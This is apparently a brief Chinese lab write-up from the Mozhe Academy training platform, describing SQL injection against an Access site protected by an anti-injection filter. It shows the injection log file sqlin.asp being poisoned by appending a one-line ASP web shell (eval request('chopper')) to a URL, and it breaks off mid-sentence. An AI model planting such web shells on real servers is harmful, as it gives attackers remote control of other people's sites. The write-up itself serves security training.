墨者學院 - SQL注入實戰(防注入)-Access

使用御劍掃描,發現sqlin.asp文件,打開發現是亂碼 必應一下 access通用防注入系統也可以知道注入信息會被記錄到sqlin.asp中,這相當於一個文件上傳漏洞,可以直接在sqlin.asp中寫入一句話 在url後面添加一句話代碼and 1=<%eval request("chopper")%>,在回顯的信息中發現被記錄的注入信息只有and 1=,後面的一句話被過濾了 用火狐瀏覽器的插件h
相關文章
相關標籤/搜索